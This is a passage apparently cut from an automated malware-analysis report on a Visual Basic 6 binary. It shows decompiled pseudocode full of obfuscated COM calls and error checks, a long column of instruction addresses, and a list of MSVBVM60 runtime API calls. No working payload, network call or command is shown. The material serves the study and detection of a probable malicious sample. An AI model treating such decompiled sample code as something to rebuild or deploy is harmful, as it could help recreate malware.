                            					_v92 = _v92 & 0x00000000;
                            					_v128 = _v376;
                            					_v136 = 8;
                            					_v264 =  *0x401180;
                            					_v256 = 0x754c8ed0;
                            					_v252 = 0x5afc;
                            					 *_t1297 =  *0x401178;
                            					_t1088 =  *((intOrPtr*)( *_a4 + 0x70c))(_a4, 0x2e2313c0, 0x5af8,  &_v256,  &_v264,  &_v136, 0x683d, _v220,  &_v236, _t1239, _t1239,  &_v240,  &_v244, _t1077);
                            					_v300 = _t1088;
                            					if(_v300 >= 0) {
                            						_v576 = _v576 & 0x00000000;
                            					} else {
                            						_push(0x70c);
                            						_push(0x40af38);
                            						_push(_a4);
                            						_push(_v300);
                            						L004013D8();
                            						_v576 = _t1088;
                            					}
                            					_v80 = _v244;
                            					_push( &_v116);
                            					_push( &_v120);
                            					_push( &_v112);
                            					_push( &_v108);
                            					_push( &_v104);
                            					_push(5);
                            					L004013C6();
                            					_push( &_v152);
                            					_push( &_v136);
                            					_push(2);
                            					L00401432();
                            					_t1299 = _t1297 + 0x24;
                            					if( *0x410010 != 0) {
                            						_v580 = 0x410010;
                            					} else {
                            						_push("Hr_");
                            						_push(0x40a678);
                            						L004013DE();
                            						_v580 = 0x410010;
                            					}
                            					_t1100 =  &_v104;
                            					L004013CC();
                            					_v268 = _t1100;
                            					_t1104 =  *((intOrPtr*)( *_v268 + 0x170))(_v268,  &_v108, _t1100,  *((intOrPtr*)( *((intOrPtr*)( *_v580)) + 0x304))( *_v580));
                            					asm("fclex");
                            					_v272 = _t1104;
                            					if(_v272 >= 0) {
                            						_v584 = _v584 & 0x00000000;
                            					} else {
                            						_push(0x170);
                            						_push(0x40b268);
                            						_push(_v268);
                            						_push(_v272);
                            						L004013D8();
                            						_v584 = _t1104;
                            					}
                            					if( *0x410010 != 0) {
                            						_v588 = 0x410010;
                            					} else {
                            						_push("Hr_");
                            						_push(0x40a678);
                            						L004013DE();
                            						_v588 = 0x410010;
                            					}
                            					_t1108 =  &_v112;
                            					L004013CC();
                            					_v276 = _t1108;
                            					_t1112 =  *((intOrPtr*)( *_v276 + 0x110))(_v276,  &_v232, _t1108,  *((intOrPtr*)( *((intOrPtr*)( *_v588)) + 0x318))( *_v588));
                            					asm("fclex");
                            					_v280 = _t1112;
                            					if(_v280 >= 0) {
                            						_v592 = _v592 & 0x00000000;
                            					} else {
                            						_push(0x110);
                            						_push(0x40b278);
                            						_push(_v276);
                            						_push(_v280);
                            						L004013D8();
                            						_v592 = _t1112;
                            					}
                            					if( *0x410010 != 0) {
                            						_v596 = 0x410010;
                            					} else {
                            						_push("Hr_");
                            						_push(0x40a678);
                            						L004013DE();
                            						_v596 = 0x410010;
                            					}
                            					_t1116 =  &_v116;
                            					L004013CC();
                            					_v284 = _t1116;
                            					_t1120 =  *((intOrPtr*)( *_v284 + 0x70))(_v284,  &_v236, _t1116,  *((intOrPtr*)( *((intOrPtr*)( *_v596)) + 0x318))( *_v596));
                            					asm("fclex");
                            					_v288 = _t1120;
                            					if(_v288 >= 0) {
                            						_v600 = _v600 & 0x00000000;
                            					} else {
                            						_push(0x70);
                            						_push(0x40b278);
                            						_push(_v284);
                            						_push(_v288);
                            						L004013D8();
                            						_v600 = _t1120;
                            					}
                            					if( *0x410010 != 0) {
                            						_v604 = 0x410010;
                            					} else {
                            						_push("Hr_");
                            						_push(0x40a678);
                            						L004013DE();
                            						_v604 = 0x410010;
                            					}
                            					_t1251 =  *((intOrPtr*)( *_v604));
                            					_t1124 =  &_v120;
                            					L004013CC();
                            					_v292 = _t1124;
                            					_t1128 =  *((intOrPtr*)( *_v292 + 0x128))(_v292,  &_v240, _t1124,  *((intOrPtr*)(_t1251 + 0x318))( *_v604));
                            					asm("fclex");
                            					_v296 = _t1128;
                            					if(_v296 >= 0) {
                            						_v608 = _v608 & 0x00000000;
                            					} else {
                            						_push(0x128);
                            						_push(0x40b278);
                            						_push(_v292);
                            						_push(_v296);
                            						L004013D8();
                            						_v608 = _t1128;
                            					}
                            					_v248 = _v240;
                            					_v244 =  *0x401170;
                            					_v176 = _v232;
                            					_v184 = 3;
                            					_v380 = _v108;
                            					_v108 = _v108 & 0x00000000;
                            					_v128 = _v380;
                            					_v136 = 9;
                            					 *_t1299 = _v236;
                            					L004012A0();
                            					asm("movsd");
                            					asm("movsd");
                            					asm("movsd");
                            					asm("movsd");
                            					 *_t1299 =  *0x40116c;
                            					L004012A0();
                            					asm("movsd");
                            					asm("movsd");
                            					asm("movsd");
                            					asm("movsd");
                            					 *((intOrPtr*)( *_a4 + 0x728))(_a4, 0x10, 0x5d72, _t1251, 0x10,  &_v244, _t1251,  &_v248);
                            					L004013C6();
                            					_t1294 = _t1299 + 0x14;
                            					L00401450();
                            					_t1147 =  *((intOrPtr*)( *_a4 + 0x710))(_a4,  &_v136, 4,  &_v104,  &_v112,  &_v116,  &_v120);
                            					_v268 = _t1147;
                            					if(_v268 >= 0) {
                            						_v612 = _v612 & 0x00000000;
                            					} else {
                            						_push(0x710);
                            						_push(0x40af38);
                            						_push(_a4);
                            						_push(_v268);
                            						L004013D8();
                            						_v612 = _t1147;
                            					}
                            					L004013C0();
                            					_push( &_v332);
                            					_push( &_v316);
                            					_t1150 =  &_v40;
                            					_push(_t1150);
                            					L004013A8();
                            					_v364 = _t1150;
                            				}
                            				 *((intOrPtr*)( *_a4 + 0x714))(_a4);
                            				_v8 = 0;
                            				asm("wait");
                            				_push(E0040DD63);
                            				_push( &_v332);
                            				_t1155 =  &_v316;
                            				_push(_t1155);
                            				_push(2);
                            				L00401432();
                            				L00401450();
                            				L00401450();
                            				L00401450();
                            				return _t1155;
                            			}










































































































































































































                            0x0040c1bd
                            0x0040c1cc
                            0x0040c1d8
                            0x0040c1e0
                            0x0040c1e3
                            0x0040c1f0
                            0x0040c1f9
                            0x0040c204
                            0x0040c207
                            0x0040c211
                            0x0040c227
                            0x0040c232
                            0x0040c239
                            0x0040c23a
                            0x0040c23f
                            0x0040c249
                            0x0040c259
                            0x0040c25a
                            0x0040c260
                            0x0040c261
                            0x0040c266
                            0x0040c273
                            0x0040c27a
                            0x0040c27b
                            0x0040c27d
                            0x0040c282
                            0x0040c28e
                            0x0040c29b
                            0x0040c2b8
                            0x0040c29d
                            0x0040c29d
                            0x0040c2a2
                            0x0040c2a7
                            0x0040c2ac
                            0x0040c2ac
                            0x0040c2ca
                            0x0040c2e2
                            0x0040c2e5
                            0x0040c2e7
                            0x0040c2f4
                            0x0040c316
                            0x0040c2f6
                            0x0040c2f6
                            0x0040c2f8
                            0x0040c2fd
                            0x0040c303
                            0x0040c309
                            0x0040c30e
                            0x0040c30e
                            0x0040c320
                            0x0040c33d
                            0x0040c340
                            0x0040c342
                            0x0040c34f
                            0x0040c371
                            0x0040c351
                            0x0040c351
                            0x0040c353
                            0x0040c358
                            0x0040c35e
                            0x0040c364
                            0x0040c369
                            0x0040c369
                            0x0040c37f
                            0x0040c386
                            0x0040c386
                            0x0040c392
                            0x0040c3af
                            0x0040c394
                            0x0040c394
                            0x0040c399
                            0x0040c39e
                            0x0040c3a3
                            0x0040c3a3
                            0x0040c3d3
                            0x0040c3d7
                            0x0040c3dc
                            0x0040c3f4
                            0x0040c3f7
                            0x0040c3f9
                            0x0040c406
                            0x0040c428
                            0x0040c408
                            0x0040c408
                            0x0040c40a
                            0x0040c40f
                            0x0040c415
                            0x0040c41b
                            0x0040c420
                            0x0040c420
                            0x0040c436
                            0x0040c453
                            0x0040c438
                            0x0040c438
                            0x0040c43d
                            0x0040c442
                            0x0040c447
                            0x0040c447
                            0x0040c477
                            0x0040c47b
                            0x0040c480
                            0x0040c498
                            0x0040c49b
                            0x0040c49d
                            0x0040c4aa
                            0x0040c4cc
                            0x0040c4ac
                            0x0040c4ac
                            0x0040c4ae
                            0x0040c4b3
                            0x0040c4b9
                            0x0040c4bf
                            0x0040c4c4
                            0x0040c4c4
                            0x0040c4da
                            0x0040c4f7
                            0x0040c4dc
                            0x0040c4dc
                            0x0040c4e1
                            0x0040c4e6
                            0x0040c4eb
                            0x0040c4eb
                            0x0040c511
                            0x0040c51b
                            0x0040c51f
                            0x0040c524
                            0x0040c53f
                            0x0040c545
                            0x0040c547
                            0x0040c554
                            0x0040c579
                            0x0040c556
                            0x0040c556
                            0x0040c55b
                            0x0040c560
                            0x0040c566
                            0x0040c56c
                            0x0040c571
                            0x0040c571
                            0x0040c583
                            0x0040c589
                            0x0040c593
                            0x0040c596
                            0x0040c5ae
                            0x0040c5bb
                            0x0040c5bc
                            0x0040c5bd
                            0x0040c5be
                            0x0040c5c7
                            0x0040c5d5
                            0x0040c5db
                            0x0040c5e8
                            0x0040c60a
                            0x0040c5ea
                            0x0040c5ea
                            0x0040c5ef
                            0x0040c5f4
                            0x0040c5f7
                            0x0040c5fd
                            0x0040c602
                            0x0040c602
                            0x0040c614
                            0x0040c61c
                            0x0040c620
                            0x0040c624
                            0x0040c625
                            0x0040c627
                            0x0040c62c
                            0x0040c635
                            0x0040c641
                            0x0040c65e
                            0x0040c643
                            0x0040c643
                            0x0040c648
                            0x0040c64d
                            0x0040c652
                            0x0040c652
                            0x0040c682
                            0x0040c686
                            0x0040c68b
                            0x0040c6a3
                            0x0040c6a9
                            0x0040c6ab
                            0x0040c6b8
                            0x0040c6dd
                            0x0040c6ba
                            0x0040c6ba
                            0x0040c6bf
                            0x0040c6c4
                            0x0040c6ca
                            0x0040c6d0
                            0x0040c6d5
                            0x0040c6d5
                            0x0040c6eb
                            0x0040c708
                            0x0040c6ed
                            0x0040c6ed
                            0x0040c6f2
                            0x0040c6f7
                            0x0040c6fc
                            0x0040c6fc
                            0x0040c72c
                            0x0040c730
                            0x0040c735
                            0x0040c74d
                            0x0040c750
                            0x0040c752
                            0x0040c75f
                            0x0040c781
                            0x0040c761
                            0x0040c761
                            0x0040c763
                            0x0040c768
                            0x0040c76e
                            0x0040c774
                            0x0040c779
                            0x0040c779
                            0x0040c78f
                            0x0040c7ac
                            0x0040c791
                            0x0040c791
                            0x0040c796
                            0x0040c79b
                            0x0040c7a0
                            0x0040c7a0
                            0x0040c7d0
                            0x0040c7d4
                            0x0040c7d9
                            0x0040c7f4
                            0x0040c7fa
                            0x0040c7fc
                            0x0040c809
                            0x0040c82e
                            0x0040c80b
                            0x0040c80b
                            0x0040c810
                            0x0040c815
                            0x0040c81b
                            0x0040c821
                            0x0040c826
                            0x0040c826
                            0x0040c83c
                            0x0040c859
                            0x0040c83e
                            0x0040c83e
                            0x0040c843
                            0x0040c848
                            0x0040c84d
                            0x0040c84d
                            0x0040c873
                            0x0040c87d
                            0x0040c881
                            0x0040c886
                            0x0040c89e
                            0x0040c8a4
                            0x0040c8a6
                            0x0040c8b3
                            0x0040c8d8
                            0x0040c8b5
                            0x0040c8b5
                            0x0040c8ba
                            0x0040c8bf
                            0x0040c8c5
                            0x0040c8cb
                            0x0040c8d0
                            0x0040c8d0
                            0x0040c8e2
                            0x0040c8e8
                            0x0040c8f2
                            0x0040c8f8
                            0x0040c902
                            0x0040c90c
                            0x0040c916
                            0x0040c920
                            0x0040c930
                            0x0040c93a
                            0x0040c940
                            0x0040c94a
                            0x0040c950
                            0x0040c95d
                            0x0040c963
                            0x0040c96d
                            0x0040c970
                            0x0040c984
                            0x0040c991
                            0x0040c992
                            0x0040c993
                            0x0040c994
                            0x0040c9af
                            0x0040c9bc
                            0x0040c9c9
                            0x0040c9ca
                            0x0040c9cb
                            0x0040c9cc
                            0x0040c9dc
                            0x0040c9f4
                            0x0040ca13
                            0x0040ca18
                            0x0040ca2a
                            0x0040ca39
                            0x0040ca45
                            0x0040ca62
                            0x0040ca47
                            0x0040ca47
                            0x0040ca4c
                            0x0040ca51
                            0x0040ca56
                            0x0040ca56
                            0x0040ca7c
                            0x0040ca86
                            0x0040ca8a
                            0x0040ca8f
                            0x0040caa7
                            0x0040caaa
                            0x0040caac
                            0x0040cab9
                            0x0040cadb
                            0x0040cabb
                            0x0040cabb
                            0x0040cabd
                            0x0040cac2
                            0x0040cac8
                            0x0040cace
                            0x0040cad3
                            0x0040cad3
                            0x0040cae2
                            0x0040caec
                            0x0040caf6
                            0x0040caff
                            0x0040cb09
                            0x0040cb16
                            0x0040cb1c
                            0x0040cb26
                            0x0040cb29
                            0x0040cb47
                            0x0040cb54
                            0x0040cb55
                            0x0040cb56
                            0x0040cb57
                            0x0040cb6b
                            0x0040cb71
                            0x0040cb7e
                            0x0040cb7f
                            0x0040cb80
                            0x0040cb81
                            0x0040cb85
                            0x0040cb92
                            0x0040cb93
                            0x0040cb94
                            0x0040cb95
                            0x0040cb9e
                            0x0040cba4
                            0x0040cbb1
                            0x0040cbd3
                            0x0040cbb3
                            0x0040cbb3
                            0x0040cbb8
                            0x0040cbbd
                            0x0040cbc0
                            0x0040cbc6
                            0x0040cbcb
                            0x0040cbcb
                            0x0040cbe0
                            0x0040cbe6
                            0x0040cbf1
                            0x0040cbfd
                            0x0040cc1a
                            0x0040cbff
                            0x0040cbff
                            0x0040cc04
                            0x0040cc09
                            0x0040cc0e
                            0x0040cc0e
                            0x0040cc3e
                            0x0040cc42
                            0x0040cc47
                            0x0040cc62
                            0x0040cc68
                            0x0040cc6a
                            0x0040cc77
                            0x0040cc9c
                            0x0040cc79
                            0x0040cc79
                            0x0040cc7e
                            0x0040cc83
                            0x0040cc89
                            0x0040cc8f
                            0x0040cc94
                            0x0040cc94
                            0x0040ccaa
                            0x0040ccc7
                            0x0040ccac
                            0x0040ccac
                            0x0040ccb1
                            0x0040ccb6
                            0x0040ccbb
                            0x0040ccbb
                            0x0040cceb
                            0x0040ccef
                            0x0040ccf4
                            0x0040cd0f
                            0x0040cd15
                            0x0040cd17
                            0x0040cd24
                            0x0040cd49
                            0x0040cd26
                            0x0040cd26
                            0x0040cd2b
                            0x0040cd30
                            0x0040cd36
                            0x0040cd3c
                            0x0040cd41
                            0x0040cd41
                            0x0040cd57
                            0x0040cd74
                            0x0040cd59
                            0x0040cd59
                            0x0040cd5e
                            0x0040cd63
                            0x0040cd68
                            0x0040cd68
                            0x0040cd98
                            0x0040cd9c
                            0x0040cda1
                            0x0040cdbc
                            0x0040cdc2
                            0x0040cdc4
                            0x0040cdd1
                            0x0040cdf6
                            0x0040cdd3
                            0x0040cdd3
                            0x0040cdd8
                            0x0040cddd
                            0x0040cde3
                            0x0040cde9
                            0x0040cdee
                            0x0040cdee
                            0x0040ce04
                            0x0040ce21
                            0x0040ce06
                            0x0040ce06
                            0x0040ce0b
                            0x0040ce10
                            0x0040ce15
                            0x0040ce15
                            0x0040ce3b
                            0x0040ce45
                            0x0040ce49
                            0x0040ce4e
                            0x0040ce66
                            0x0040ce6c
                            0x0040ce6e
                            0x0040ce7b
                            0x0040cea0
                            0x0040ce7d
                            0x0040ce7d
                            0x0040ce82
                            0x0040ce87
                            0x0040ce8d
                            0x0040ce93
                            0x0040ce98
                            0x0040ce98
                            0x0040ceb5
                            0x0040ceba
                            0x0040cebd
                            0x0040cec4
                            0x0040cec9
                            0x0040cecf
                            0x0040cedf
                            0x0040cefe
                            0x0040cf2e
                            0x0040cf34
                            0x0040cf41
                            0x0040cf63
                            0x0040cf43
                            0x0040cf43
                            0x0040cf48
                            0x0040cf4d
                            0x0040cf50
                            0x0040cf56
                            0x0040cf5b
                            0x0040cf5b
                            0x0040cf80
                            0x0040cf85
                            0x0040cf8e
                            0x0040cf9b
                            0x0040cfa1
                            0x0040cfa3
                            0x0040cfb0
                            0x0040cfd2
                            0x0040cfb2
                            0x0040cfb2
                            0x0040cfb7
                            0x0040cfbc
                            0x0040cfbf
                            0x0040cfc5
                            0x0040cfca
                            0x0040cfca
                            0x0040cfd9
                            0x0040cfe3
                            0x0040cfed
                            0x0040cff7
                            0x0040d001
                            0x0040d008
                            0x0040d018
                            0x0040d01f
                            0x0040d026
                            0x0040d02d
                            0x0040d034
                            0x0040d035
                            0x0040d038
                            0x0040d039
                            0x0040d03e
                            0x0040dcb4
                            0x0040d049
                            0x0040d053
                            0x0040d069
                            0x0040d074
                            0x0040d07a
                            0x0040d084
                            0x0040d0b5
                            0x0040d0bb
                            0x0040d0c8
                            0x0040d0ea
                            0x0040d0ca
                            0x0040d0ca
                            0x0040d0cf
                            0x0040d0d4
                            0x0040d0d7
                            0x0040d0dd
                            0x0040d0e2
                            0x0040d0e2
                            0x0040d0f7
                            0x0040d103
                            0x0040d120
                            0x0040d105
                            0x0040d105
                            0x0040d10a
                            0x0040d10f
                            0x0040d114
                            0x0040d114
                            0x0040d144
                            0x0040d148
                            0x0040d14d
                            0x0040d168
                            0x0040d16b
                            0x0040d16d
                            0x0040d17a
                            0x0040d19c
                            0x0040d17c
                            0x0040d17c
                            0x0040d17e
                            0x0040d183
                            0x0040d189
                            0x0040d18f
                            0x0040d194
                            0x0040d194
                            0x0040d1aa
                            0x0040d1c7
                            0x0040d1ac
                            0x0040d1ac
                            0x0040d1b1
                            0x0040d1b6
                            0x0040d1bb
                            0x0040d1bb
                            0x0040d1eb
                            0x0040d1ef
                            0x0040d1f4
                            0x0040d20f
                            0x0040d215
                            0x0040d217
                            0x0040d224
                            0x0040d249
                            0x0040d226
                            0x0040d226
                            0x0040d22b
                            0x0040d230
                            0x0040d236
                            0x0040d23c
                            0x0040d241
                            0x0040d241
                            0x0040d257
                            0x0040d274
                            0x0040d259
                            0x0040d259
                            0x0040d25e
                            0x0040d263
                            0x0040d268
                            0x0040d268
                            0x0040d298
                            0x0040d29c
                            0x0040d2a1
                            0x0040d2b9
                            0x0040d2bf
                            0x0040d2c1
                            0x0040d2ce
                            0x0040d2f3
                            0x0040d2d0
                            0x0040d2d0
                            0x0040d2d5
                            0x0040d2da
                            0x0040d2e0
                            0x0040d2e6
                            0x0040d2eb
                            0x0040d2eb
                            0x0040d301
                            0x0040d31e
                            0x0040d303
                            0x0040d303
                            0x0040d308
                            0x0040d30d
                            0x0040d312
                            0x0040d312
                            0x0040d342
                            0x0040d346
                            0x0040d34b
                            0x0040d363
                            0x0040d369
                            0x0040d36b
                            0x0040d378
                            0x0040d39d
                            0x0040d37a
                            0x0040d37a
                            0x0040d37f
                            0x0040d384
                            0x0040d38a
                            0x0040d390
                            0x0040d395
                            0x0040d395
                            0x0040d3a4
                            0x0040d3ae
                            0x0040d3b8
                            0x0040d3c2
                            0x0040d3cf
                            0x0040d3d5
                            0x0040d3df
                            0x0040d3e2
                            0x0040d3f2
                            0x0040d3fb
                            0x0040d401
                            0x0040d40e
                            0x0040d419
                            0x0040d425
                            0x0040d42b
                            0x0040d435
                            0x0040d449
                            0x0040d456
                            0x0040d457
                            0x0040d458
                            0x0040d459
                            0x0040d473
                            0x0040d48d
                            0x0040d49a
                            0x0040d49b
                            0x0040d49c
                            0x0040d49d
                            0x0040d4a6
                            0x0040d4af
                            0x0040d4b7
                            0x0040d4bb
                            0x0040d4bf
                            0x0040d4c3
                            0x0040d4c4
                            0x0040d4c6
                            0x0040d4d4
                            0x0040d4db
                            0x0040d4dc
                            0x0040d4de
                            0x0040d4e3
                            0x0040d4ed
                            0x0040d50a
                            0x0040d4ef
                            0x0040d4ef
                            0x0040d4f4
                            0x0040d4f9
                            0x0040d4fe
                            0x0040d4fe
                            0x0040d52e
                            0x0040d532
                            0x0040d537
                            0x0040d54f
                            0x0040d552
                            0x0040d554
                            0x0040d561
                            0x0040d583
                            0x0040d563
                            0x0040d563
                            0x0040d565
                            0x0040d56a
                            0x0040d570
                            0x0040d576
                            0x0040d57b
                            0x0040d57b
                            0x0040d591
                            0x0040d5ae
                            0x0040d593
                            0x0040d593
                            0x0040d598
                            0x0040d59d
                            0x0040d5a2
                            0x0040d5a2
                            0x0040d5d2
                            0x0040d5d6
                            0x0040d5db
                            0x0040d5f6
                            0x0040d5fc
                            0x0040d5fe
                            0x0040d60b
                            0x0040d630
                            0x0040d60d
                            0x0040d60d
                            0x0040d612
                            0x0040d617
                            0x0040d61d
                            0x0040d623
                            0x0040d628
                            0x0040d628
                            0x0040d63e
                            0x0040d65b
                            0x0040d640
                            0x0040d640
                            0x0040d645
                            0x0040d64a
                            0x0040d64f
                            0x0040d64f
                            0x0040d67f
                            0x0040d683
                            0x0040d688
                            0x0040d6a0
                            0x0040d6a3
                            0x0040d6a5
                            0x0040d6b2
                            0x0040d6d4
                            0x0040d6b4
                            0x0040d6b4
                            0x0040d6b6
                            0x0040d6bb
                            0x0040d6c1
                            0x0040d6c7
                            0x0040d6cc
                            0x0040d6cc
                            0x0040d6db
                            0x0040d6dd
                            0x0040d6df
                            0x0040d6e8
                            0x0040d6e9
                            0x0040d6ee
                            0x0040d6f8
                            0x0040d715
                            0x0040d6fa
                            0x0040d6fa
                            0x0040d6ff
                            0x0040d704
                            0x0040d709
                            0x0040d709
                            0x0040d72f
                            0x0040d739
                            0x0040d73d
                            0x0040d742
                            0x0040d75d
                            0x0040d760
                            0x0040d762
                            0x0040d76f
                            0x0040d791
                            0x0040d771
                            0x0040d771
                            0x0040d773
                            0x0040d778
                            0x0040d77e
                            0x0040d784
                            0x0040d789
                            0x0040d789
                            0x0040d79e
                            0x0040d7a4
                            0x0040d7ab
                            0x0040d7b0
                            0x0040d7b9
                            0x0040d7bf
                            0x0040d7c9
                            0x0040d7cc
                            0x0040d7dc
                            0x0040d7e2
                            0x0040d7ec
                            0x0040d80c
                            0x0040d848
                            0x0040d84e
                            0x0040d85b
                            0x0040d87d
                            0x0040d85d
                            0x0040d85d
                            0x0040d862
                            0x0040d867
                            0x0040d86a
                            0x0040d870
                            0x0040d875
                            0x0040d875
                            0x0040d88a
                            0x0040d890
                            0x0040d894
                            0x0040d898
                            0x0040d89c
                            0x0040d8a0
                            0x0040d8a1
                            0x0040d8a3
                            0x0040d8b1
                            0x0040d8b8
                            0x0040d8b9
                            0x0040d8bb
                            0x0040d8c0
                            0x0040d8ca
                            0x0040d8e7
                            0x0040d8cc
                            0x0040d8cc
                            0x0040d8d1
                            0x0040d8d6
                            0x0040d8db
                            0x0040d8db
                            0x0040d90b
                            0x0040d90f
                            0x0040d914
                            0x0040d92c
                            0x0040d932
                            0x0040d934
                            0x0040d941
                            0x0040d966
                            0x0040d943
                            0x0040d943
                            0x0040d948
                            0x0040d94d
                            0x0040d953
                            0x0040d959
                            0x0040d95e
                            0x0040d95e
                            0x0040d974
                            0x0040d991
                            0x0040d976
                            0x0040d976
                            0x0040d97b
                            0x0040d980
                            0x0040d985
                            0x0040d985
                            0x0040d9b5
                            0x0040d9b9
                            0x0040d9be
                            0x0040d9d9
                            0x0040d9df
                            0x0040d9e1
                            0x0040d9ee
                            0x0040da13
                            0x0040d9f0
                            0x0040d9f0
                            0x0040d9f5
                            0x0040d9fa
                            0x0040da00
                            0x0040da06
                            0x0040da0b
                            0x0040da0b
                            0x0040da21
                            0x0040da3e
                            0x0040da23
                            0x0040da23
                            0x0040da28
                            0x0040da2d
                            0x0040da32
                            0x0040da32
                            0x0040da62
                            0x0040da66
                            0x0040da6b
                            0x0040da86
                            0x0040da89
                            0x0040da8b
                            0x0040da98
                            0x0040daba
                            0x0040da9a
                            0x0040da9a
                            0x0040da9c
                            0x0040daa1
                            0x0040daa7
                            0x0040daad
                            0x0040dab2
                            0x0040dab2
                            0x0040dac8
                            0x0040dae5
                            0x0040daca
                            0x0040daca
                            0x0040dacf
                            0x0040dad4
                            0x0040dad9
                            0x0040dad9
                            0x0040daff
                            0x0040db09
                            0x0040db0d
                            0x0040db12
                            0x0040db2d
                            0x0040db33
                            0x0040db35
                            0x0040db42
                            0x0040db67
                            0x0040db44
                            0x0040db44
                            0x0040db49
                            0x0040db4e
                            0x0040db54
                            0x0040db5a
                            0x0040db5f
                            0x0040db5f
                            0x0040db74
                            0x0040db80
                            0x0040db8c
                            0x0040db92
                            0x0040db9f
                            0x0040dba5
                            0x0040dbaf
                            0x0040dbb2
                            0x0040dbca
                            0x0040dbd7
                            0x0040dbe4
                            0x0040dbe5
                            0x0040dbe6
                            0x0040dbe7
                            0x0040dbef
                            0x0040dbfa
                            0x0040dc07
                            0x0040dc08
                            0x0040dc09
                            0x0040dc0a
                            0x0040dc13
                            0x0040dc2b
                            0x0040dc30
                            0x0040dc39
                            0x0040dc4d
                            0x0040dc53
                            0x0040dc60
                            0x0040dc82
                            0x0040dc62
                            0x0040dc62
                            0x0040dc67
                            0x0040dc6c
                            0x0040dc6f
                            0x0040dc75
                            0x0040dc7a
                            0x0040dc7a
                            0x0040dc92
                            0x0040dc9d
                            0x0040dca4
                            0x0040dca5
                            0x0040dca8
                            0x0040dca9
                            0x0040dcae
                            0x0040dcae
                            0x0040dcc9
                            0x0040dccf
                            0x0040dcd6
                            0x0040dcd7
                            0x0040dd38
                            0x0040dd39
                            0x0040dd3f
                            0x0040dd40
                            0x0040dd42
                            0x0040dd4d
                            0x0040dd55
                            0x0040dd5d
                            0x0040dd62

                            APIs
                            • __vbaChkstk.MSVBVM60(?,004012A6), ref: 0040C1D8
                            • __vbaVarDup.MSVBVM60 ref: 0040C227
                            • #543.MSVBVM60(?,?), ref: 0040C23A
                            • __vbaVarTstNe.MSVBVM60(00008002,?,?,?,?,?), ref: 0040C261
                            • __vbaFreeVarList.MSVBVM60(00000002,?,?,00008002,?,?,?,?,?), ref: 0040C27D
                            • __vbaNew2.MSVBVM60(0040B248,004103C4,?,?,004012A6), ref: 0040C2A7
                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B238,0000001C), ref: 0040C309
                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B258,00000064), ref: 0040C364
                            • __vbaFreeObj.MSVBVM60(00000000,?,0040B258,00000064), ref: 0040C386
                            • __vbaNew2.MSVBVM60(0040A678,Hr_,?,?,004012A6), ref: 0040C39E
                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040C3D7
                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B268,00000048), ref: 0040C41B
                            • __vbaNew2.MSVBVM60(0040A678,Hr_), ref: 0040C442
                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040C47B
                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B278,00000048), ref: 0040C4BF
                            • __vbaNew2.MSVBVM60(0040A678,Hr_), ref: 0040C4E6
                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040C51F
                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B288,000000E8), ref: 0040C56C
                            • __vbaChkstk.MSVBVM60(00514F93,?), ref: 0040C5AE
                            • __vbaHresultCheckObj.MSVBVM60(00000000,004011C8,0040AF38,000006FC,?,?,00514F93,?), ref: 0040C5FD
                            • __vbaFreeStr.MSVBVM60(?,?,00514F93,?), ref: 0040C614
                            • __vbaFreeObjList.MSVBVM60(00000003,?,?,?,?,?,00514F93,?), ref: 0040C627
                            • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,004012A6), ref: 0040C635
                            • __vbaNew2.MSVBVM60(0040A678,Hr_,?,?,?,?,?,?,004012A6), ref: 0040C64D
                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040C686
                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B278,000000F0), ref: 0040C6D0
                            • __vbaNew2.MSVBVM60(0040A678,Hr_), ref: 0040C6F7
                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040C730
                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B288,00000048), ref: 0040C774
                            • __vbaNew2.MSVBVM60(0040A678,Hr_), ref: 0040C79B
                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040C7D4
                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B268,00000128), ref: 0040C821
                            • __vbaNew2.MSVBVM60(0040A678,Hr_), ref: 0040C848
                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040C881
                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B268,000001DC), ref: 0040C8CB
                            • __vbaChkstk.MSVBVM60(00000008), ref: 0040C984
                            • __vbaChkstk.MSVBVM60(?,?,000017DD,Underbevidsthed,003554E3,00000008), ref: 0040C9BC
                            • __vbaFreeObjList.MSVBVM60(00000004,?,?,?,?,?,000017DD,Underbevidsthed,003554E3,00000008), ref: 0040C9F4
                            • __vbaFreeVarList.MSVBVM60(00000003,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004012A6), ref: 0040CA13
                            • __vbaVarMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004012A6), ref: 0040CA39
                            • __vbaNew2.MSVBVM60(0040A678,Hr_), ref: 0040CA51
                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040CA8A
                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B268,00000048), ref: 0040CACE
                            • __vbaChkstk.MSVBVM60(667A4DB0,00005B07,?), ref: 0040CB47
                            • __vbaChkstk.MSVBVM60(?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040CB71
                            • __vbaChkstk.MSVBVM60(?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040CB85
                            • __vbaHresultCheckObj.MSVBVM60(00000000,004011C8,0040AF38,00000700,?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040CBC6
                            • __vbaFreeObj.MSVBVM60(?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040CBE6
                            • __vbaFreeVar.MSVBVM60(?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040CBF1
                            • __vbaNew2.MSVBVM60(0040A678,Hr_,?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040CC09
                            • __vbaObjSet.MSVBVM60(?,00000000,?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040CC42
